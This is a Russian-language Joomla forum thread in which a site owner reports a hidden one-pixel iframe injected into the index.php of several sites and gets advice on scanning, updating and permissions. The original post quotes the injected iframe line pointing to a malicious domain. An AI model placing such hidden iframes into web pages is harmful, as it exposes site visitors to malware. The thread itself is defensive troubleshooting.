Форум русской поддержки Joomla!® CMS
03.12.2016, 10:54:19 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Подозрительный фрейм на сайте в Joomla 3

 (Прочитано 566 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Ganq
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 45


« : 07.07.2015, 14:09:39 »

Всем привет решил сеня проверить свою сборку Joomla 3 у меня порядка 5 сайтов на ней. Зашел добавить счетчик и нашел вот такой код в index.php
Цитировать
<iframe src="http://googletraids.ml/46b4 " width="1" height="1" frameborder="0"></iframe>
Данный код находился в шапке сайта.
Так как я делал с 0 шаблон для сеа точно помню то что данный код я не добавлял. Шаблон собирал на примере Jblank.
Решил проверить все свои сайты и нашел там данный фрейм у всех сайтов.  Все они лежат на одном хосте. Посмотрел дату изменения файла. Все нормально изменялся мною последний раз. Зашел в стандартные шаблоны, которые были установлены опять же нашел данную строку.
Самое интересное что касперский блочит эту ссылку и говорит что там вирус.
Как решить трабл чтобы избежать последующих измений в коде со стороны?
Данные код я уже выпелил из сайтов.
На этом же хосте лежит  еще парочку сайтов на Joomla тока 2.5 но данного кода в них я не нашел
Записан
Ganq
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 45


« Ответ #1 : 07.07.2015, 14:18:10 »

так же проверил свои резервные копии сайта данного фрейма там тоже не обнаружил.
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2271



« Ответ #2 : 07.07.2015, 14:31:34 »

Решить можно обновлением всех своих компонентов-плагинов и проверкой сайта айболитом. Так же проверить права на папки. Вот статья в помощь.
« Последнее редактирование: 07.07.2015, 14:34:46 от SeBun » Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2649


step by step


« Ответ #3 : 07.07.2015, 16:10:10 »

Как вариант- взломали Joomla 2.5, а код вируса прописали на нужном сайте, что находиться на одно аккаунте.
п.с.
ВОт и проверим, модер только ко мне придирается, что я пишу про айболит
Решить можно обновлением всех своих компонентов-плагинов и проверкой сайта айболитом.
Записан
Ganq
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 45


« Ответ #4 : 07.07.2015, 16:32:10 »

Как вариант- взломали Joomla 2.5, а код вируса прописали на нужном сайте, что находиться на одно аккаунте.
п.с.
ВОт и проверим, модер только ко мне придирается, что я пишу про айболит

Ну не знаю.  Джмумла была 3.1
2.5 лежит в другой папке она никак не связана с с другими.
Обновил Joomla и модули, убрал фреймы  проверил сайт на вирусы через онлайн антивирус др веба.  Щас займусь папками и айболитом.

Кстати а айболит норм? стоит его вообще юзать или лучше плагины поставить типа админ тулса?
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2271



« Ответ #5 : 07.07.2015, 17:06:52 »

Кстати а айболит норм? стоит его вообще юзать или лучше плагины поставить типа админ тулса?

Посмотрите статью - сравнение сканеров.
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4570


Skype: renor_


« Ответ #6 : 07.07.2015, 17:59:31 »

Движок чистый! Это у вас проблемы.
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2649


step by step


« Ответ #7 : 07.07.2015, 18:26:40 »

Ну не знаю.  Джмумла была 3.1
2.5 лежит в другой папке она никак не связана с с другими.
open_basedir прописана в конфиге для домена/папки ? Владелец разные ?
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #8 : 08.07.2015, 10:56:17 »

Как вариант- взломали Joomla 2.5, а код вируса прописали на нужном сайте, что находиться на одно аккаунте.
п.с.
ВОт и проверим, модер только ко мне придирается, что я пишу про айболит

Вроде взрослый человек, не один год друг друга знаем, если не понимаете о чем речь объясню как вы и хотели в открытую, может поймете так, не придирался ни к кому просто попросил вас, о том что надо писать информативные посты в помощь задающему вопрос, а не вставлять одни и те же бессмысленные отписки, уж лучше мимо проходите, мне все равно что вы пишете в постах но когда надо помогать не стоит писать одно и тоже вот Ваши посты только последние

а сканер айболит уже советовали применить для поиска шелла ?
Откуда Joomla скачанная? Проверьте сканером айболит файлы сайта
Если Joomla до 1.5.26, и до 2.5.28, то все содержат уязвимость.
Сканер айболит в помощь
Не понял про это действие- Сканер айболит в помощь

Joomla до .5.28 содержит уязвимость.Обновить пакетом Joomla 2.5-2.5.28
Сканер айболит в помощь
Сканер айболит в помощь. Версии Joomla до 2.5.28 содержат уязвимость безопасности, обновите Joomla и все установленные сторонние расширения
Сравнивать файлы указанные айболитом, с файлами из архива Joomla/расширений
ссылка на сайт?
сканер айболит в помощь.гугл обычно реагирует на вредоносный JavaScript
Joomla до .5.28 содержит уязвимость.Обновить пакетом Joomla 2.5-2.5.28
Сканер айболит в помощь

и прошлогодние

сканер айболит в помощь http://joomlaforum.ru/index.php/topic,195980.0.html
Есть раздел на форуме Безопасность .
Искать начни сначала с помощью сканера айболит

и поверьте мне это только малая часть ваших постов ни о чем

draff вы или помогайте развернутыми ответами или мимо проходите как многие поступают когда нету время, не набивайте себе цену не надо в топиках просто отмечаться что бы показать свою подпись, вам посоветовал вставить в подпись то что вы пишите, потому что зачем посты набивать с одним смысловым содержанием ведь можно просто отмечаться в топиках просто с подписью без ответов на вопросы.
Берите пример хотя бы с колег таких как SeBun wishlight winstrool они или отвечают развернуто или направляют в нужном направлении, или мимо проходят если время нету.
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2649


step by step


« Ответ #9 : 08.07.2015, 11:37:36 »

Берите пример хотя бы с колег таких как SeBun wishlight winstrool они или отвечают развернуто или направляют в нужном направлении, или мимо проходят если время нету.
Офигеть.Вот и проверил.Значит SeBun можно свободно писать про айболит, см. пост выше моего, а я набиваю себе цену и т.д. А то что в личке мне написано
приветствую
вы в подпись вставьте айболита себе, а то сколько тем по существу ни чего а "сканер айболит в помощь" только у вас и wishlight
И что можно еще посоветовать человеку, который задает вопрос, из которого видно, что он не хочет перечитывать всю информацию в разделе Безопасность.
« Последнее редактирование: 08.07.2015, 11:45:48 от draff » Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3525


« Ответ #10 : 08.07.2015, 17:33:22 »

И что можно еще посоветовать человеку, который задает вопрос, из которого видно, что он не хочет перечитывать всю информацию в разделе Безопасность.
мимо пройти чем просто отметиться
Решить можно обновлением всех своих компонентов-плагинов и проверкой сайта айболитом. Так же проверить права на папки. Вот статья в помощь.
читаем пост внимательно, там не просто отметка, и после этого поста человек еще пишет

холиварить не будем, моя просьба остается просьбой, а ваше право выбора что писать
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet